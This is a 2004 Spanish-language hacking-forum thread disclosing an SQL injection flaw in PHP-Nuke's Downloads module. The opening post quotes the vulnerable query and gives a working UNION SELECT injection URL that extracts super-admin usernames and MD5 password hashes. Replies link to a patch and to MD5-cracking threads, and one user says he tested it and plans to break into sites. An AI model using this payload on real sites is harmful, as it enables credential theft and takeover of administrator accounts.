Fallo phpnuke te permite ver los md5 de los admin (6-5-2004)

Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

19 Marzo 2010, 01:00

Temas destacados: [BLOG] Advisory: ffmpeg puede grabar X de cualquier usuario

Foro de elhacker.net

Seguridad Informática

Bugs y Exploits (Moderadores: Anon, berz3k)

Fallo phpnuke te permite ver los md5 de los admin (6-5-2004)

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Autor

Tema: Fallo phpnuke te permite ver los md5 de los admin (6-5-2004) (Leído 2072 veces)

el-brujo

Adm

Desconectado

Mensajes: 15.263

La libertad no se suplica, se conquista

Fallo phpnuke te permite ver los md5 de los admin (6-5-2004)

« en: 08 Mayo 2004, 04:45 »

Por DarkBicho

Esta falla se encuentra en la variable orderby en las siguientes lineas de codigo en el index.php de donwload en la linea 901

Código:

$result=$db->sql_query("
SELECT lid, url, title, description, date, hits, downloadratingsummary, totalvotes,
totalcomments, filesize, version, homepage
FROM ".$prefix."_downloads_downloads
WHERE sid=$sid
order by $orderby
limit $min,$perpage
");

Mediante el siguiente querry se hace la peticion para obtener los md5

Código:

localhost/nuke72/modules.php?name=Downloads
&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**
/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/
**/LIMIT/**/1/*

Hasta ahora no se ha sacado parche.

http://www.net-security.org/vuln.php?id=3434

Fuente:
http://www.darkbicho.tk/


« Última modificación: 08 Mayo 2004, 06:12 por el-brujo »	En línea

Give peace a chance

"elhacker.net es único, por eso no fabrica para otras marcas"

Crack_X

Anti-War
Colaborador

Desconectado

Mensajes: 2.323

Peace & Love

Re: Fallo phpnuke te permite ver los md5 de los admin (6-5-2004)

« Respuesta #1 en: 08 Mayo 2004, 11:12 »

La fuente original es de bugtraq: http://www.securityfocus.com/archive/1/362266/2004-05-04/2004-05-10/0

Patches aqui: http://www.nukefixes.com/ftopict-596.html#1696

Para mas seguridad en cuanto a php-nuke: http://www.nukesecurity.com


	En línea

Shit loads of money spend to show us wrong from right. Say no to war

Yasser Has Things To Say
WarZone

Mr_x

Desconectado

Mensajes: 2

Re: Fallo phpnuke te permite ver los md5 de los admin (6-5-2004)

« Respuesta #2 en: 08 Mayo 2004, 14:38 »

como de sencripto los md5 o Clave Hash


	En línea

Crack_X

Anti-War
Colaborador

Desconectado

Mensajes: 2.323

Peace & Love

Re: Fallo phpnuke te permite ver los md5 de los admin (6-5-2004)

« Respuesta #3 en: 08 Mayo 2004, 23:58 »

http://foro.elhacker.net/index.php/topic,19194.0

Citar

descifrar md5
http://foro.elhacker.net/index.php?board=5;action=display;threadid=13639

Crackeando MD5
http://foro.elhacker.net/index.php?board=23;action=display;threadid=18547;start=msg96083#msg96083


	En línea

Shit loads of money spend to show us wrong from right. Say no to war

Yasser Has Things To Say
WarZone

oRTNZ

Desconectado

Mensajes: 814

no no soy malo... soy vicioso :p

Re: Fallo phpnuke te permite ver los md5 de los admin (6-5-2004)

« Respuesta #4 en: 11 Mayo 2004, 07:54 »

ya lo probe devuelve infaltablemente el hash ....
ahora sigue le segundo paso, aunque es mas complicado que el primer paso haber si logro penetrar a los php nuevamente


	En línea

(31 del 12 de 2005) un dia que recuerdo siempre! :p
(03 del 08 de 2006) otro dia que lo recordare siempre...
Si eres Peruano, QUEDATE y si quieres ser de segunda mano del pais que fueras, pues LARGATE Y NO REGRESES...

Ambolius

Desconectado

Mensajes: 1.345

/España/Guadalajara

Re: Fallo phpnuke te permite ver los md5 de los admin (6-5-2004)

« Respuesta #5 en: 11 Mayo 2004, 10:23 »

Para este segundo paso como dices tenermos el explot hecho por blade pegado en este mismo subforo...


	En línea

Un informático a otro:
- ¿Cuantos eran los Dálmatas?
- 101.
- Por el culo te la hinco.

Rentero

Colaborador

Desconectado

Mensajes: 1.163

La paciencia es la madre de la ciencia.

Re: Fallo phpnuke te permite ver los md5 de los admin (6-5-2004)

« Respuesta #6 en: 12 Mayo 2004, 01:40 »

http://www.adictosnet.com.ar/nuke.php


	En línea

Firmado.

oRTNZ

Desconectado

Mensajes: 814

no no soy malo... soy vicioso :p

Re: Fallo phpnuke te permite ver los md5 de los admin (6-5-2004)

« Respuesta #7 en: 12 Mayo 2004, 04:06 »

gracias Ambolius, lo tengo bien recordado


	En línea

Nuker

Desconectado

Mensajes: 18

Re: Fallo phpnuke te permite ver los md5 de los admin (6-5-2004)

« Respuesta #8 en: 10 Junio 2004, 16:16 »

eso solo sirve desde linux cierto?


	En línea

aNexos

Registered Linux User: 354086

Desconectado

Mensajes: 4.454

¿Quieres saber?, toma tiempo para aprender.

Re: Fallo phpnuke te permite ver los md5 de los admin (6-5-2004)

« Respuesta #9 en: 10 Junio 2004, 16:40 »

supongo que con "desde" te refieres a que tu estas en una maquina con s.o. Linux.

Pues no, no solo sirve desde Linux, de hecho el S.O. que manejes no tiene que ver con eso. eso es cosa del portal.


	En línea

Páginas: [1]

Ir a:

Yashira.org Videojuegos indetectables.net Seguridad Informatica Colombia Indejuegos Internet móvil

Noticias Informatica Seguridad Informática ADSL eNYe Sec Seguridad Wireless Underground México Biblioteca de Seguridad

Todas las webs afiliadas están libres de publicidad engañosa.